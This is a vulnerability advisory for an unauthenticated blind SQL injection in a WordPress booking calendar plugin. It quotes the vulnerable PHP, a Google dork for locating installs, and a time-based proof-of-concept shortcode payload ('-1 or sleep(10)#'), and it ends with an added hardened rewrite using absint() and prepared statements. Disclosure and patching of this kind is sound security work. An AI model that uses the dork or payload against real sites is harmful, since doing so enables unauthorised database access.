# Exploit Title: Wordpress booking calendar contact form <=v1.0.23 - Unauthenticated blind SQL injection
# Date: 2016-02-08
# Google Dork: Index of /wp-content/plugins/booking-calendar-contact-form
# Exploit Author: Joaquin Ramirez Martinez [ i0 SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Plugin URI: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Version: 1.0.23
# Tested on: windows 10 + firefox.

==============
Description
==============

Create a booking form with a reservation calendar or a classic contact form, connected to a PayPal payment button.

With the **Booking Calendar Contact Form** you can create a **classic contact form** or a **booking form with a reservation calendar**, connected to a PayPal payment button. The reservation calendar lets the customer select the start (ex: check-in) and end (ex: checkout) dates. The **reservation calendar** is an optional item, so it can be disabled to create a **general purpose contact form**.

There are two types of bookings available in the calendar configuration: full day bookings or partial day bookings. With full day bookings the whole day is blocked / reserved, while in partial day bookings the start and end dates are partially blocked, as used for example in **room/hotel bookings**.

===================
Technical details
===================

The Booking Calendar Contact Form plugin is prone to a blind SQL injection in its shortcode handler `dex_bccf_filter_content`: the `calendar` attribute of the shortcode is assigned to the constant `DEX_BCCF_CALENDAR_FIXED_ID` without any sanitization, and `dex_bccf_get_public_form()` then concatenates that constant directly into the WHERE clause of a query.

function dex_bccf_filter_content($atts)
{
    ...
    extract(shortcode_atts(array(
        'calendar' => '',
        'user'     => '',
    ), $atts));

    if ($calendar != '')
        define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar);
    ...
    return $buffered_contents;
}

function dex_bccf_get_public_form()
{
    global $wpdb;

    if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0)
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE conwer=" . DEX_CALENDAR_USER);
    else if (defined('DEX_BCCF_CALENDAR_FIXED_ID'))
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME . " WHERE id=" . DEX_BCCF_CALENDAR_FIXED_ID);
    else
        $myrows = $wpdb->get_results("SELECT * FROM " . DEX_BCCF_CONFIG_TABLE_NAME);
    ...
}

==================
Proof of concept
==================

An editor or author can add a shortcode carrying the SQL payload to a post:

[CP_BCCF_FORM calendar=-1 or sleep(10)#]

The payload is meant to reach `dex_bccf_get_public_form()` unchanged, so the executed statement has the form

SELECT * FROM <DEX_BCCF_CONFIG_TABLE_NAME> WHERE id=-1 or sleep(10)#

and the page takes roughly ten seconds longer to render, which is the time-based blind oracle. Placing the shortcode needs an account that can edit post content (author or editor); once it is in a published post, the query runs every time that post is rendered, whoever requests it.

==========
CREDITS
==========

Vulnerability discovered by: Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q

========
TIMELINE
========

2016-02-01 vulnerability discovered
2016-02-05 reported to vendor
2016-02-08 released fixed plugin v1.0.24
2016-02-08 public disclosure
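The following is an added example, not code from the plugin or from the advisory's author: a hardened rewrite of the two functions quoted under Technical details. It assumes a WordPress runtime (`$wpdb`, `shortcode_atts()`, `absint()`, `esc_html()`) and that the plugin defines `DEX_BCCF_CONFIG_TABLE_NAME` as the advisory shows; the `_hardened` suffixes and the minimal rendering stand-in at the end of the handler are this example's own, since the advisory elides the plugin's form rendering. The `conwer` branch is parameterised as well even though the advisory does not say where `DEX_CALENDAR_USER` comes from.

```php
<?php
// Added example, not the plugin's code. Assumes a WordPress runtime and
// that DEX_BCCF_CONFIG_TABLE_NAME is defined by the plugin, as in the advisory.

function dex_bccf_filter_content_hardened($atts)
{
    $atts = shortcode_atts(array(
        'calendar' => '',
        'user'     => '',
    ), $atts, 'CP_BCCF_FORM');

    // Original: define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar) with the raw
    // attribute string. Coerce to a non-negative integer first: absint() turns
    // "-1 or sleep(10)#" into 0, so attacker-controlled text never reaches SQL.
    // The defined() guard avoids a PHP warning when the constant already exists.
    $calendar_id = absint($atts['calendar']);
    if ($calendar_id > 0 && !defined('DEX_BCCF_CALENDAR_FIXED_ID')) {
        define('DEX_BCCF_CALENDAR_FIXED_ID', $calendar_id);
    }

    $rows = dex_bccf_get_public_form_hardened();
    if (empty($rows)) {
        return '';
    }

    // The plugin renders a full booking form here (elided in the advisory too);
    // this stand-in only emits the selected configuration id, HTML-escaped.
    return '<div class="dex_bccf">' . esc_html($rows[0]->id) . '</div>';
}

function dex_bccf_get_public_form_hardened()
{
    global $wpdb;

    if (defined('DEX_CALENDAR_USER') && DEX_CALENDAR_USER != 0) {
        // %d makes $wpdb->prepare() cast the value to an integer, so the
        // query text itself never contains attacker-supplied characters.
        $myrows = $wpdb->get_results($wpdb->prepare(
            'SELECT * FROM ' . DEX_BCCF_CONFIG_TABLE_NAME . ' WHERE conwer = %d',
            DEX_CALENDAR_USER
        ));
    } elseif (defined('DEX_BCCF_CALENDAR_FIXED_ID')) {
        // Second layer of defence after absint(): even if some other code path
        // defines the constant with a string, %d still forces an integer.
        $myrows = $wpdb->get_results($wpdb->prepare(
            'SELECT * FROM ' . DEX_BCCF_CONFIG_TABLE_NAME . ' WHERE id = %d',
            DEX_BCCF_CALENDAR_FIXED_ID
        ));
    } else {
        // No user input is involved in this branch; the table name is a
        // plugin constant, not request data.
        $myrows = $wpdb->get_results('SELECT * FROM ' . DEX_BCCF_CONFIG_TABLE_NAME);
    }

    return $myrows;
}
```

The two layers are deliberate: `absint()` stops the payload at the shortcode boundary, and `$wpdb->prepare()` with `%d` guarantees that whatever ends up in the constant is interpolated as an integer rather than as SQL text. Either one alone defeats the `-1 or sleep(10)#` payload; keeping both means a future code path that defines the constant from another source does not silently reopen the hole.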